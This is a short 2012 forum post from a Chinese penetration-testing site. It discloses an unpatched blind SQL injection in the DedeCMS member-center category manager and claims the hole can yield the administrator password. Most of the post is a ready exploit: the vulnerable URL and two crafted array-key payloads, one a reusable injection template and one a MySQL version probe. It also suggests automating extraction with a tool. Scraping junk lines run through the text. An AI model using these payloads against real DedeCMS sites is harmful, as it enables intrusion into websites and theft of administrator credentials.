中国网络渗透测试联盟
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
[打印本页]
作者:
admin
时间:
2012-12-20 08:08
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.
+ j3 Y% l7 G0 j: u {
: i( R8 \( s; e, Q2 x, Q
; V& m5 L6 E5 a5 g9 z# w
发生在数组key里的注射漏洞,有点意思.
* K, v4 D6 ]- h# E( b
/ B) p+ o) F0 l" R% \
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
" C) h- f. n) o ?$ h0 ^! n
5 Y/ R# d$ Y# [0 T6 y) Q" I
http://www.xxx.com
/dede/member/mtypes.php?dopost=save
- Q' B6 J8 @/ `: ^2 w
6 \: e& k+ g7 |* n; N' u
exploit:
; y. I2 [, x0 i& F2 J1 }% z% ^% ~+ G5 X
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
6 i& B0 {2 e; M: b
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
% v4 H" K( P, @2 C/ G( \5 K
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2